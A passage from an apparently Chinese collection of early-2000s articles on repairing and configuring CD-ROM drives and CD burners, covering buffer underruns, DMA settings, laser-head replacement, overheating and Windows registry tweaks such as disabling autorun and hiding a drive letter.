第一个问题是传动的第二个齿轮是双层齿轮，两层一样，而且和同一个齿轮啮合，不知是何道理。第二个问题是电动机上的齿轮的形状比较特殊，它不是一个单独的齿轮，上面还有一个比齿轮大一点的圆盘，圆盘并没有跟任何部件接触，而且圆盘边缘处下方有一黑色橡胶环，不知是作何用途。第三个问题是光头径向移动到头后如何判断到头了？两头并没有发现任何机关或传感器之类的东西。

第一个问题至今没找到答案。不过后两个问题的解决却是修好刻录机的关键。

我发现橡胶环下的电路上有两个元件(半个绿豆大)，而这个电路板上的元件很少，其它地方完全放得下这两个元件，为何要放到这个下方。原来就是用这个和电机上的橡胶环来检测电机的转动。大概橡胶环上有磁性物质，下面的元件则能检测磁场的变化，从而检测电机的转动。现在这个环和下面的元件距离还有点大，元件感应不到，所以检测不到移动，导致光头乱跑。道理想通了，就来试试看。小心的把齿轮往下敲，直到刚好不接触到元件为止。装上一试，果然成功。


刻录机欠载故障实例分析

《一键清理系统垃圾》

刻录机欠载故障实例分析

笔者买的是LG 24×的IDE刻录机，型号是GCE-8240B。当时32×刚刚出来，24×开始降价，所以应该是个比较好的选择时机。但是，笔者在实际应用中遇到了不少问题。

    故障现象：LG刻录机安装在笔者的电脑上后，刻录光盘时无法使用最高速进行刻录。刻录时只能使用12×以下，最稳定的是选用8×，不然会频繁出现刻录欠载现象。

    故障分析：笔者电脑配置：主板是ABIT的BE6-Ⅱ（BX），CPU是PⅡ233，128MB内存，TNT2pro32MB显卡，15GB昆腾硬盘。笔者曾经尝试换了一块杂牌的VIA693的主板，依然有这个问题。笔者针对故障做了几个可能性的判断。
    1.刻录机有问题
    笔者使用的是NERO刻录软件，它可以对设备的型号和软件做一个识别。笔者发现可以正常识别刻录机的型号和一些参数，当时版本是1.07，上网查到LG已经升级到1.08版，下载后进行了升级，但没有改善。
    2.刻录盘的问题
    据笔者所知，的确有不少时候速度上不去是刻录盘的原因。由于笔者的刻录机有8MB的缓存，并且具备“ExacLink”技术来防止自动缓存交互错误，所以，反复出现欠载是比较可能的。由于刻录机24×出现不久，对不少盘的刻录速度的确需要实际的检验。笔者选用了3种价格不同的刻录盘，发现仍然出现问题，排除了刻录盘的问题。
    3.电脑和刻录机兼容性问题
    一般，出现的故障比较可能的是由设置和软件使用带来的。笔者首先想到的是DMA通道问题。DMA不打开时，CPU的占用率会很高。

    主板VIA693必须打4in1的补丁才可以打开DMA，打开后首先发现刻录出错，点“取消”后发现不出错了，但是现象依旧。难道LG刻录机不支持DMA?一查说明书，第一句就是“使用VIA芯片组的主板，请关闭DMA模式”。

    由于这块VIA主板不支持UDMA66，不能发挥笔者的硬盘速度。笔者只好仍然使用原来那块BE6Ⅱ的主板。但是，又发现一个问题，BX板的DMA不可选，怎么回事?一旦笔者选择了DMA，光盘的盘符就不见了。由于笔者使用的是Win98操作系统，应该在光驱支持DMA的情况下能正常打开。

    查了一下LG刻录机的资料，支持PIO4和DMA。其中，PIO4就是笔者一直使用的模式，PIOProgrammed I/O模式的最大弊端是耗用极其大量的CPU资源，在以前还未有DMA模式光驱的时候，光驱都是以PIO模式运行。而它所支持的DMA也与笔者平常简称的DMA不同。DMA模式分为Single-Word DMA及Multi-Word DMA两种，跟PIO模式的最大区别是：DMA模式并不用过分依赖CPU的指令而运行，可达到节省处理器运行资源的效果。不过，后来由于Ultra DMA模式的出现和快速普及，这两个模式也只会是昙花一现，不久即被UDMA所取代。而笔者所说的DMA33就是UDMA了，中间出现的DMA已经被替代了。但是，LG刻录机选用的DMA模式是Multi-Word DMA，所以，笔者看不到它支持UDMA33，这是它在选用DMA时的不同。

    那么，确认了支持Multi-Word DMA后，还不能打开DMA只有可能是主板上的一些设置导致冲突。进入BIOS设置，发现由于IRQ中断自动识别时出现过问题，笔者强行指定了中断号。恢复自动设置后，再进入“控制面板→系统→设备管理器→CD-ROM→刻录机→属性→设置→DMA设定”中进行选择


刻录机常见故障

《一键清理系统垃圾》

刻录机常见故障

刻录机常见故障

    常见故障一：安装刻录机后无法启动电脑

    首先切断电脑供电电源，打开机箱外壳检查IDE线是否完全插入，并且要保证PIN-1的接脚位置正确连接。如果刻录机与其它IDE设备共用一条IDE线，需保证两个设备不能同时设定为“MA”(Master)或“SL”(Slave)方式，可以把一个设置为“MA”，一个设置为“SL”。

    常见故障二：使用模拟刻录成功，实际刻录却失败

    刻录机提供的“模拟刻录”和“刻录”命令的差别在于是否打出激光光束，而其它的操作都是完全相同 的，也就是说，“模拟刻录＂可以测试源光盘是否正常，硬盘转速是否够快，剩余磁盘空间是否足够等刻录环境的状况，但无法测试待刻录的盘片是否存在问题和刻录机的激光读写头功率与盘片是否匹配等等。有鉴于此，说明“模拟刻录”成功，而真正刻录失败，说明刻录机与空白盘片之间的兼容性不是很好，可以采用如下两种方法来重新试验一下：

    1. 降低刻录机的写入速度，建议2X以下；

    2. 请更换另外一个品牌的空白光盘进行刻录操作。出现此种现象的另外一个原因就是激光读写头功率衰减现象造成的，如果使用相同品牌的盘片刻录，在前一段时间内均正常，则很可能与读写头功率衰减有关，可以送有关厂商维修。

    常见故障三：无法复制游戏CD

    一些大型的商业软件或者游戏软件，在制作过程中，对光盘的盘片做了保护，所以在进行光盘复制的过程中，会出现无法复制，导致刻录过程发生错误，或者复制以后无法正常使用的情况发生。

    常见故障四：刻录的CD音乐不能正常播放

    并不是所有的音响设备都能正常读取CD-R盘片的，大多数CD机都不能正常读取CD-RW盘片的内容，所以最好不要用刻录机来刻录CD音乐。另外，还需要注意的是，刻录的CD音乐，必须要符合CD-DA文件格式。

    常见故障五：刻录软件刻录光盘过程中，有时会出现“BufferUnderrun”的错误提示信息

    “BufferUnderrun”错误提示信息的意思为缓冲区欠载。一般在刻录过程中，待刻录数据需要由硬盘经 过IDE界面传送给主机，再经由IDE界面传送到刻录机的高速缓存中(BufferMemory)，最后刻录机把储存在 BufferMemory里的数据信息刻录到CD-R或CD-RW盘片上，这些动作都必须是连续的，绝对不能中断，如果其中任何一个环节出现了问题，都会造成刻录机无法正常写入数据，并出现缓冲区欠载的错误提示，进而是盘片报废。解决的办法就是，在刻录之前需要关闭一些常驻内存的程序，比如关闭光盘自动插入通告，关闭防毒软件、Window任务管理和计划任务程序和屏幕保护程序等等。

    常见故障六：光盘刻录过程中，经常会出现刻录失败

    提高刻录成功率需要保持系统环境单纯，即关闭后台常驻程序，最好为刻录系统准备一个专用的硬盘，专门安装与刻录相关的软件。在刻录过程中，最好把数据资料先保存在硬盘中，制作成“ISO镜像文件”，然后再刻入光盘。为了保证刻录过程数据传送的流畅，需要经常对硬盘碎片进行整理，避免发生因文件无法正常传送，造成的刻录中断错误，可以通过执行“磁盘扫描程序”和“磁盘碎片整理程序”来进行硬盘整理。此外，在刻录过程中，不要运行其它程序，甚至连鼠标和键盘也不要去轻易去碰。刻录使用的电脑最好不要与其他电脑联网，在刻录过程中，如果系统管理员向本机发送信息，会影响刻录效果，另外，在局域网中，不要使用资源共享，如果在刻录过程中，其它用户读取本地硬盘，会造成刻录工作中断或者失败。除此以外，还要注意刻录机的散热问题，良好的散热条件会给刻录机一个稳定的工作环境，如果因为连续刻录，刻录机发热量过高，可以先关闭电脑，等温度降低以后再继续刻录。针对内置式刻录机最好在机箱内加上额外的散热风扇。外置式刻录机要注意防尘，防潮，以免造成激光头读写不正常。

    常见故障七：使用EasyCDPro刻录无法识别中文目录名

    在使用EasyCDPro刻录中文文件名的时候，可以在文件名选项中选取Romeo，就可以支持长达128位文件 名，即64个汉字的文件名了。另外，WinonCD、Nero、DirectCD2.x等都能很好地支持长中文文件名， EasyCDCreator在这方面要稍微麻烦一些。


刻录机只读不写的软故障

《一键清理系统垃圾》

刻录机只读不写的软故障

《中国电脑教育报》吴大副

    最近买了台明基40x刻录机，一直用的不错。突然一天，当运行刻录软件时，却出现蓝屏提示某文件出错。把刻录软件删了再安装，但一运行安装文件就蓝屏死机。用覆盖法重新安装Windows 98，但结果还是一样。为了避免格式化C盘重新安装Windows 98浪费时间，于是决定从另一台机器上克隆整个硬盘到这台机器上。

    克隆很快就完成了，不需要安装其他的软件和驱动程序（两台电脑的配置都是一样的）。当启动进入到Windows 98后，安装NERO刻录软件，没有出现错误，运行也很正常。于是就想刻录一张光盘，但是提示找不到刻录机。那就奇怪了，明明是有光盘图标的。放入刻录机一张数据光盘，双击打开光盘，能够看见数据文件，这说明光驱是可以用的。但为什么会提示找不到刻录机呢？原以为是软件问题，于是重新刻录一次，结果还是那样。是不是光驱驱动程序有问题？于是我就用光驱驱动程序软盘进行重新安装，但是最后结果还是一样。一时处于迷惑之中，偶然双击了没有放入光盘的光驱符，居然能进入，只是没有任何文件罢了，就好像是进入了一个没有文件的硬盘分区。按常理不会这样的，如果光驱中没有入光盘，当双击光驱符时会弹出一对话框，提示：无法访问，设备尚未准备！我开始怀疑是不是系统误认为这个光驱是硬盘的一个分区（虽然它显示为光驱图标），因此在刻录时系统就提示找不到刻录机呢？于是我进入控制面板下的“系统”属性查看，果然在“设备管理器”下找不到有关光驱的项目，这一结果肯定了我的想法。通过添加新硬件和安装原装驱动程序都不行，那么最后只能让操作系统自己去识别。我最后决定再次用覆盖法重新安装Windows 98，当安装完成重启后，那刻录机终于被NERO识别出来了，我又可以进行疯狂的刻录工作。


巧换光驱激光头

《一键清理系统垃圾》

巧换光驱激光头

    光盘驱动器是电脑设备中较娇贵的设备之一，平常我们使用光驱来装软件、玩游戏、看VCD、听音乐不管是正版光盘、D版光盘、有划伤的、太薄的太厚的光盘都往里面塞，时间一长，光驱渐渐地开始挑盘，最后彻底罢工。用清洗盘或酒精棉擦后，能够读一些质量较好的盘了。可没过几天，又得重新折腾一番。最后不得不祭出必杀技──调激光头的功率，可这样做毕竟治标不治本。激光头的功率增大后，光盘是能够顺畅地读出来了，可是光头也正在加速老化。不久，光驱终于光荣退役，成了名副其实的“茶杯架子”。只得买个新的了。可是这时的光驱不论是电路部分还是机械部分都是完好无损的，只是激光头损坏了而已，只要花上几十块钱购买一个激光头换上去，就能使光驱完好如初。以下介绍我为光驱更换激光头的经历：
        1.大家可能会认为光驱是精密的仪器，内部结构比较复杂。其实不然，一般说来普通的光盘驱动器主要由三个部分组成：电路控制部分、机械传动部分、光头组件部分。首先我们要拆卸的是光驱的前面板，前面板是通过四个塑料软扣扣在后盖上固定，打开这几个软扣后，整个前面板就会松动，这时要注意由于光驱的托盘面板卡住了前面板，所以得先将光驱的托盘轻轻地拉出来，取下托盘的面板。接下来拆卸光驱的后铁盖，松开铁盒上四周固定的螺丝，记住还有一颗螺丝躲藏在易碎纸下面不易被发现，掀开铁盖，第一步的工作就完成了。
        2.仔细观察光驱的内部构造，可以分为上下两个部分：下面是一块较大的电路板，这是整个光驱的电路控制部分，它负责控制光头读取光盘信息以及将信息进行初步处理，上面就是光驱的机械传动部分和光头组件部分。仔细观察下面的那块电路板，注意到电路板上一共有三处连线与上面的光头组件相连。中间那一组较大的排线是用于传输激光头读取到的光盘信息，左边的那组排线是用于控制机械部分动作的，还有另一条是电源线，拔掉这三处的插线，就可以取出下面的那块电路板。
        3.在电路板的正上方就是光头组件部，不过由下往上看时是不易看见激光头的，还得进一步拆卸，先取下光驱顶部压制光盘用的磁铁片，然后慢慢地拨动旁边的齿轮组退出托盘，此时可以清楚地看见整个光头组件就固定在下方的硬塑料壳上，这时可以很轻易地拆下整个光头组件，不过我们只是要更换激光头，所以不必如此大费周章。激光头是由一层紧硬的金属外壳包裹着，正上方是一个蓝色的激光发射器，拆卸的时候要注意不要用手去碰到它。如果要清洗激光头请注意不要使用酒精或其它溶解性的清洁剂，因为在激光头的表面有一层薄薄的保护膜会很容易被溶解破坏掉，最好是使用棉花蘸上少量的清水擦拭就行了。在激光头的后面紧贴着一块小板，小板上插着一组排线，这组排线的另一端连接的正是刚才拆下来的在中间的那组最大数据排线，光盘信息就是从这组排线中传输出去的。激光头依靠两个环形塑料固定在一根金属轴上，通过旁边的电机推动，光头沿着金属轴前后滑动来进行定位。不同的光驱所使用的激光头是不一样的，主要的不同点在于光头后面的数据排线类型和激光头的运行轨道固定方式。所以购买时一定要注意激光头的类型，不要弄错了，可以在激光头的铁壳上找到激光头的厂家及型号，若实在无法辨认时就折下你的激光头到电子市场上去一一对照之后再买。
        换上新的激光头以后，将光驱按照原先拆卸的顺序接好并恢复原状接回到电脑上去，取出那些原先一直无法读取的光盘来试一下，你的光驱就如同新买的一样，可以再用上个一年半载的了。在此请注意以上的方法只适用于普通的CD-ROM，请不要在其它的CD-R，CD-R/W或DVD上尝试。愿诸位玩家都有一个永不损坏的光驱。


巧妙解决由散热引起光驱故障

《一键清理系统垃圾》

巧妙解决由散热引起光驱故障

  随着光驱的使用频率越来越高，出现故障的机率也越来越大，朋友经常利用光驱看碟，是一位典型的碟友，这不在两年的时间里，就换了两个DVD-ROM光驱了。虽然如今DVD-ROM价格虽然便宜，但这样的使用更换频率也着实让人心痛，而多数原因也是由于使用频率过高造成光驱的激光头老化所致。这不朋友刚刚购买还不到二个月的DVD-ROM光驱，又出现问题了。

    故障现象：

    朋友这台DVD光驱是近期购买的产品，品牌为三星的金将军DVD-ROM光驱，使用频率较高，经常看碟，但据朋友反映读盘能力还不错。近期出现了一个怪现象，在开机时，计算机有时候能够检测到光驱并能够正常使用，但有时去无法正常的测试到光驱，并且在使用过程中经常出现光驱无故丢失的现象，即打开我的电脑中没有发现光驱的盘标，并且放入盘也无法使用。

    故障原因及分析：

    根据笔者的经验，出现以上问题的原因可能有以下几个方面：

    1、光驱数据线或电源线接口松动，接触不良

    光驱的数据线或是电源线接口处松动，呈现虚接现象，稍动一下机箱便可能出现脱节的现象。

    2、光驱自身有问题

    光驱的激光头读盘性能不稳定或者是光驱电路板上的芯片散热不良时，使光驱经常工作在较热的环境中，容量引起以上的问题。

    3、 光驱供电不正常

    电源的额定功率较低，无法持续提供光驱足够的工作电压。

    故障排除：

    由于笔者朋友这台机器采用了世纪之星自由战士II的电源，其它配置也不算高，电脑中仅有一块显卡和一块网卡，最近并未增加新的配件，因此排除了电源供电不足引起的故障。仔细检查光驱的电源线，光驱的供电端-4针D形电源插头，与光驱的电源接口接触良好，插头内的金属簧片并没有氧化现象。再检查光驱数据线，并没有发现主板与光驱背部的IDE数据有松动的情况，再次排除数据线与电源线松动引起的故障。

    难不成是光驱自身出现了问题，为了查找出问题的根源，于是笔者将光驱从电脑中拆了出来，在取下后发现光驱的机顶盖上已经布满了一层厚厚的灰尘，用手触摸光驱机身，能够感觉到明显的热量。难不成就是由于散热不良引起的。于是笔者将光驱的清理干净，并重新装入到机箱托架的中间的光驱位上，打开机器看了一个多小时的碟片后，问题解决。

    后来朋友告诉笔者，这台光驱前段时间曾出现过一个小的问题，便是光驱电路板上的一个电容坏了，于是送经销商修理过，由于维修人员在对光驱进行检测后再次组装时，都没有考虑光驱的芯片散热问题，所以就会出现上述故障。由这起故障可以看到，光驱的散热也是我们不容忽视的一个问题，解决散热问题不但可以防止光驱的各种故障发生，更能够提供光驱的使用寿命。


轻松处理光驱小毛病

《一键清理系统垃圾》

轻松处理光驱小毛病

    说实在的，随着计算机产品的高集成化，再加上各生产厂商零部件的不可互换性，其可修理性很低。像光驱的集成块和激光头，电机，柔性电缆损坏，硬盘的集成电路，磁臂，主板的CPU插座等，损坏后修复的可能性很低，除非碰到一样的型号的，可以拼成一台好的用。

    不过一般的小毛病还是可以修理的。下面就说一说光驱几种常见的小故障的维修。

    1．仓盒能够正常的进出，但光盘放进后没有任何动作。

    光盘放进后的动作有：光头寻道的上下动作，光盘伺服电机转动的声音。这里的没有任何动作就时没有上述两种动作的一点声音。如果属于上述情况一般是光驱的12V电压正常，但是5V电压没有加上。属于这种情况的话，在确定是光驱问题的话，一般是电源接口处的保险电阻损坏。保险电阻的形状如图＜＞所示，和有的和普通电阻类似，颜色为绿色，有的和整流二极管相信，直不过整体为黑色。其上有如下标注：

    对于这类故障，可以直接用导线把损坏的保险电阻短接即可。

    造成这类故障的原因是：

    ① 开机瞬间电压不稳

    ② 主机开关电源稳压性能不好，电压偏高。

    ③ 带电拔插光驱的电源插头。

  2．加电后，光驱没有任何反应。

    光驱插入电源后，既不出盒，工作指示灯也不亮，里面也没有任何动作。这各故障1类似，为12V电压加不上。

    3．光驱出仓不易或不出仓。

    ① 出仓皮带老化

    这种故障常见使用一年以上的光驱，因为皮带老化，自身形变过长，造成传动力量不够，不能顺利完成出仓动作。可到电子市场购买录音机的皮带，略小3－5mm换上就行。

    ② 其他异物卡在托盘的齿缝里，造成托盘无法正常出仓。

    这种情况一般见于52X的光驱，因为光驱运行速度高，如果光盘的质量不好或表面贴有不干胶标签，这时便容易炸盘。有的光驱炸盘后没有造成大的损坏，光驱还可以正常使用，但是因为内部的光盘颗粒没有清除干净，有的小颗粒正好附在托盘的齿缝里的润滑硅脂里，就造成不能出盒到位。解决方法是取下托盘，仔细把附在齿缝里的光盘小颗粒取出就行。

    4．光驱能够出仓，但是出来后马上又回去。

    一般这种情况是光驱的出仓到位判断开关时间过长表面氧化，造成开关接触不良，使机器误认为出仓不顺，在延时一段时间后又进仓。这种情况一般常见于Philips机芯。解决办法是用水沙纸轻轻打磨开关的簧片即可。

    5．光驱读盘性能差。

    ① 清洗光头

    大家都知道清冼光头不能用酒精，其实我用过多次来清洗我在1997所购习的8X光驱，到现在还能够用来放CD。因为光驱正常使用的话，光驱的寿命为2－3年，我们也清洗不了几次。用棉签蘸酒精清洗光头没问题的。重要的动作要轻，不要出现其他意外就行。臂如：连接光头的柔性电缆折断。我们在拔插柔性电缆时，一定要松开固定夹，然后再拉出电缆。在装回时，也一定要先按原位置把柔性电缆轻轻插入，再把固定夹推回原位置就行了。千万不要在不松开固定夹的情况下硬拉出柔性电缆，在装回时更容易把柔性电缆折断。

    ② 调节光头电位器
  6．光驱的光头有寻道动作，但是光盘不转或有转的动作，但是转不起来。

    光驱的工作原理：当光盘进仓后，伺服电机上方的光盘固定装把光盘固定后，光头动作，开始寻找是否有光盘存在。如果检测到有光盘时，伺服电机开始旋转，这时光头读取光盘最里面的位置的信息（类似硬盘的主引导区），通过此位置的内容来判别光盘是CD，VCD，DVD，CD－I等光盘类型。如果是DVD光驱的话，要用两种不同的激光束来读取光盘，这就是为什么DVD光驱认盘时间长的原因。上述的故障是光盘伺服电机的相关电路有故障。可能时伺服电机内部损坏（找同类型的旧光驱的电机更换），驱动集成块损坏（出现这种情况时有时会出现光驱一找到盘只要光驱一转电脑主机就启动，这也是驱动IC损坏所致。），也可能时柔性电缆某根断线。

    7．光驱能够读盘或放VCD，但是只能放十来分钟。

    这种情况一般是在拆卸光驱和清洗光头时，动作不正确或有失误，造成光头的柔性电缆有不可见的折断现象。当光头移动到一定位置时，电缆部分断开，信号传输中断，这时机器判定有故障后自动复位所致。

    注意事项：

    1．不要带电拔插光驱，即使没有连接数据线。最好使用有单独开关的电源为光驱供电。

    2．拆卸机械部分和电路板之间的柔性电缆时，一定要松开固定夹，不要硬拉硬插。

    3．在修理完毕后，注意不要把IC芯片上面的皮垫丢弃。以免光驱在长时间工作中因为散热不良而损坏驱动IC。

    使用心得：

    1．如果条件允许，光驱最好竖直放置，因为此时光头上不会有灰尘覆盖，光驱的使用寿命会更长一些。

    2．在用电脑放置VCD，DVD时，如果硬盘允许最好把电影文件拷到硬盘上再放。因为我们拷贝一部VCD光驱只需要工作4－5分钟，而使用软件放VCD时，光驱在整个播放电影期间都在工作。还有用硬盘播放VCD时会少有马赛可现象。长时间使用可以节省光驱的寿命。

    3．光盘如果不能正常出盒时，我们可用伸展开的曲别针插入光盘应急孔，轻轻往里捅，手动使光盘出盒。

    4．不要使用质量太差的光盘，以免出现炸盘情况。


清洗光盘引起的故障

《一键清理系统垃圾》

清洗光盘引起的故障

故障现象：笔者有一台Acer 48×光驱，平时使用正常，一日看VCD时，因为发现VCD上有污垢，就用药棉擦拭，然后放入光驱，但运行几秒钟后，计算机死机，光驱不能弹出，指示灯长亮。重新启动计算机，进入程序管理器，点击光驱盘符，无任何反应，重新启动几次，故障依然。

    分析与维修：光驱指示灯长亮，说明供电系统正常，但光驱不能弹出，光驱激光头不能进行读操作，怀疑光驱电机部分和激光头有问题。拆下光驱，打开外壳，发现光驱激光头托架弹起后不能复位，接上电源，发现电机有轻微动作。断电后用手转动齿轮，激光头托架能正常复位。光盘托架正常弹出，说明电机及机械部分正常。又怀疑主控板因长时间连续工作导致某器件损坏，拔下激光头与主控板边缘电缆，按弹出键与播放键，光驱指示灯闪亮正常，初步判断主控板正常。

    进一步观察发现光驱激光头位置异常，且加电无任何反应，轻轻转动光驱激光头连杆，发现齿轮处有一棉丝缠绕，取出棉丝，重新启动计算机，一切正常。 至此真相大白，原来是用酒精棉擦拭光盘时，光盘放入光驱时带入了少许棉丝，致使光驱激光头连杆齿轮卡住，导致上述故障。

    注意：最好不要使用损坏的光盘，光盘有污垢一定要用酒精棉球擦拭干净，并要仔细检查光盘上是否带有棉丝或其他杂物！


清洗光盘引起的故障维修

《一键清理系统垃圾》

清洗光盘引起的故障维修

故障现象：笔者有一台Acer 48×光驱，平时使用正常，一日看VCD时，因为发现VCD上有污垢，就用药棉擦拭，然后放入光驱，但运行几秒钟后，计算机死机，光驱不能弹出，指示灯长亮。重新启动计算机，进入程序管理器，点击光驱盘符，无任何反应，重新启动几次，故障依然。

    分析与维修：光驱指示灯长亮，说明供电系统正常，但光驱不能弹出，光驱激光头不能进行读操作，怀疑光驱电机部分和激光头有问题。拆下光驱，打开外壳，发现光驱激光头托架弹起后不能复位，接上电源，发现电机有轻微动作。断电后用手转动齿轮，激光头托架能正常复位。光盘托架正常弹出，说明电机及机械部分正常。又怀疑主控板因长时间连续工作导致某器件损坏，拔下激光头与主控板边缘电缆，按弹出键与播放键，光驱指示灯闪亮正常，初步判断主控板正常。

    进一步观察发现光驱激光头位置异常，且加电无任何反应，轻轻转动光驱激光头连杆，发现齿轮处有一棉丝缠绕，取出棉丝，重新启动计算机，一切正常。 至此真相大白，原来是用酒精棉擦拭光盘时，光盘放入光驱时带入了少许棉丝，致使光驱激光头连杆齿轮卡住，导致上述故障。

    注意：最好不要使用损坏的光盘，光盘有污垢一定要用酒精棉球擦拭干净，并要仔细检查光盘上是否带有棉丝或其他杂物！


如何关闭CD自动播放功能

《一键清理系统垃圾》

如何关闭CD自动播放功能

    Win 2000在系统默认情况下具有CD自动播放功能，可以对光驱进行监视。如果我们在光驱中放入CD或VCD光盘，系统就会自动启动相应的程序来播放它们。有时这项功能也会给我们带来不便，尤其在读“烂盘”时，系统就会自动启动多个应用程序,常常搞得我们焦头烂额。为了避免再次陷入类似窘境，我们可以将系统的CD自动播放功能关闭，具体方法如下：

    打开注册表编辑器，进入主键［HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDRom］，将“Autorun”键值更改为0（Hex）。


如何在WinXP下使用刻录机

《一键清理系统垃圾》

如何在WinXP下使用刻录机

2002-03-05　　　作者：小滔/小滔视点

    早就知道WinXP增加了对刻录机的支持，也就是无需任何第三方软件直接在WinXP中就能完成刻录的工作，但是一直没有机会测试。前几天刚添置了刻录机，于是迫不及待的在WinXP中进行测试。（注：此次使用的刻录机为啄木鸟DH1610，16X10X40X，和ASUS使用同一IDE口，刻录机为从盘。）

    正确的完成硬件的安装，启动WinXP后并没有出现什么找到新硬件的提示，或者是太快我根本就没有看见，反正打开“我的电脑”后已经发现多个一个光驱的图标。打开该光驱的属性窗口，在其中多了一个“录制”的选项，你可以设置存放镜像文件的位置以及刻录的速度等参数。对于镜像文件的存放位置建议选择剩余空间比较大的盘符，因为WinXP在刻录时会将需要刻录的文件做一个镜像，有人可能会觉得奇怪，要刻录的文件不是已经在硬盘上了吗，何必还要做这个镜像呢？但是WinXP才不会管这么多，它完全按照自己的意愿进行操作。而刻录速度的选择也不要设定太高，以免出现刻录失败的情况。

    WinXP刻录操作非常简单，你可以直接将文件拖放到光驱中，也可能通过文件的右键菜单中“发送”到光驱中。
完成文件的选择，打开光驱你会发现所选择的文件已经在光驱中，只是其图标和普通的文件图标有所不同，直接选择“将这些文件写入CD”即可开始刻录工作。这时会弹出刻录的向导窗口，将提示你完成刻录的操作。

    刻录完成后，会提示你是否再刻录一张，如果你选择是，那么将再次刻录一张和刚才相同的光盘。

在开始测试时，会担心WinXP在刻录完成后会将光盘终结，也就是再无法写入数据，于是测试的时候，是采用一张CD-RW进行刻录。但在后来的使用中发现，WinXP并没有终结光盘，只要光盘还有写入的空间，那么你就可以继续刻录。在刻录时，粗略的记录了其刻录的时间，发现其刻录的速度并不是很快，刻录一种600M的光驱差不多要十几分钟，而同样的数据用Nero进行刻录时只需要七分钟左右。

    与Win2000相比，WinXP还有一个不同的地方。那就是当你选择了文件，而没有进行刻录，就算你退出了光盘，再次进入刻录光驱时，发现选择的文件还在其中，这实际上说明这是WinXP使用镜像文件的缘故。

    在进行数据刻录时，还出现了一个意外情况。当选择“将这些文件写入CD”时，系统没有反映，反覆的点击到最后出现多个警告窗口：

    后来终于出现写入的向导，但是写入数据失败。说CD-RW已经损坏，不会吧，这张CD-RW可要20元啊，真是心痛。再次进行写入，这次正常了，估计是开始所开的进程太多，影响了数据的写入工作，因此建议大家在刻录时最好不要进行其它的工作。

对刻录数据进行了测试，接着对CD-RW的擦除进行测试。以为可以像删除文件对其操作，但是当选择文件直接进行删除时却出现警告的窗口，无法进行删除。而只有选择“删除此CD-RW”进行光驱的擦除操作。此时也同样会弹出类似于写入的向导窗口，只是首次进行擦除工作时，虽然系统提示完成擦除，但再次查看光盘时发现文件并没有被删除。而从此时的光驱右键菜单中选择擦除时，却正常完成，估计这只是偶尔的情况。擦除的速度一般，类似于Nero中的快速擦除。

    总结WinXP的刻录操作，实际上它是以多区段方式来写入数据，在每次刻录时都会将数据文件镜像到硬盘上，并且刻录的速度也不是太好，这样好像说明WinXP下的刻录是一无是处。但毕竟是系统自带，使用起来也还算比较方便。


删除虚拟光驱创建的盘符

《一键清理系统垃圾》

删除虚拟光驱创建的盘符

    问：最近我安装了一个虚拟光驱软件，可当我卸载它以后，“我的电脑”里由它创建的光驱盘符图标却一直留在那里，怎么也去不掉，请问该怎么解决？

    答：你卸载时可能出了问题，如果系统是Windows 2000或Windows XP，你可以在“控制面板→系统→性能维护→设备管理器”中，在“CD-ROM”下，卸载掉你的虚拟光驱(一般名为xxx SCSI CD-ROM DEVICE)；如果系统是Windows 98，你可以在注册表中删除虚拟光盘图标，运行“regedit”找到HKEY_LOCAL_MACHINE\Enum\SCSI项，下面几个子键分别对应虚拟光盘和物理光驱，把对应虚拟光盘的子键(子键名含有SCSI字符)全部删除即可。


虚拟光驱抢占中断引起的鼠标故障

《一键清理系统垃圾》

虚拟光驱抢占中断引起的鼠标故障

《中国电脑教育报》李兵

    最近朋友爱机的建基3D鼠标出现了移动不灵活的毛病，有时甚至根本不能移动，就像死机了一样，但是键盘却能正常使用，看来是鼠标出了问题。

    我带着自己的鼠标来到了他家。一般来说，鼠标不能正常工作的常见原因有三个：一是鼠标内部污垢太多导致鼠标移动不灵活；二是鼠标内部出现了机械性损坏；三是鼠标与其他板卡设备存在资源冲突。分析了可能引发故障的原因之后我开始一一检查，打开鼠标之后发现它的内部是有污垢，但是根本没有多到引起故障的地步，而且内部的电子元件也没有损坏的痕迹，鼠标按键按起来的声音依然清脆。莫非鼠标真与其他设备存在着资源冲突？进入“控制面板”并打开“设备管理器”，赫然发现在鼠标一项的前面有一个大大的黄色惊叹号。还等什么呢？赶紧点击鼠标属性，更改它的中断资源。但重新启动后发现鼠标依然移动不灵活，而设备管理器前鼠标一项的惊叹号还健在！

    没办法，只好关掉计算机后拆开机箱，通过排除法来确定故障由哪一个硬件与鼠标共同占用一个中断引起的。可打开机箱后发现里面只有内置Modem和显卡两块板卡，显卡使用AGP接口，这显然不可能与鼠标共用一个中断。只有Modem了，但以前“小猫”一直与“老鼠”和平共处的呀！看样子故障原因并不在这儿。装好机箱后再次开机进入系统后我惊奇的发现竟然有两个光驱，其中一个还是DVD，但是看他的机箱上明明只有一个光驱嘛。朋友笑笑说这是前两天为了玩光盘版的游戏而装的一个虚拟光驱程序，这个名为Daemon Tools 3.11的软件装上之后就生成了一个V386 Stealth DVD的虚拟光驱。我忽然灵光一闪，难道是这个软件惹出来的祸？赶紧进入“控制面板”，在“添加/删除程序”中将该软件删掉。又一次重新启动系统之后，故障终于排除了，而原先“设备管理器”中鼠标一项前的惊叹号也不见了。虚拟的设备竟然也会与真正的硬件设备抢中断，这真是一个奇怪的鼠标故障！


隐藏光驱的方法

《一键清理系统垃圾》

隐藏光驱的方法

    一、修改注册表
    假设你的光驱盘符为F，通过以下步骤可以禁止别人使用你的光驱：

    首先，点击“开始→运行”，输入“REGEDIT”打开注册表编辑器。依次展开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer，新建一个二进制值名为“NoDrives”，其键值默认为“00 00 00 00”。它由4个二进制字节构成，第一个字节代表从A到H的8个盘，其中：01为A、02为B、04为C、08为D、10为E、20为F、40为G、80为H，第二个字节代表I到P；第三个字节代表Q到X；第四个字节代表Y和Z。如果光驱为F盘，你只要把“NoDrives”的键值由“00 00 00 00”改为“20 00 00 00”就行了。注销后，在“我的电脑”里已经不能查看到光驱盘符了，但别人还是可以通过MS-DOS方式来访问你的光驱，因此还必须禁止MS-DOS方式。

    然后打开注册表编辑器，依次展开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer，新建一DWORD值，名为“WinOldApp”，将值设为“1”；再新建一DWORD值，名为“NoRealMode”，其值设为“1”。

    最后用记事本打开“C:\msdos.sys”，在末尾加上“Bootkeys=0”，保存退出。

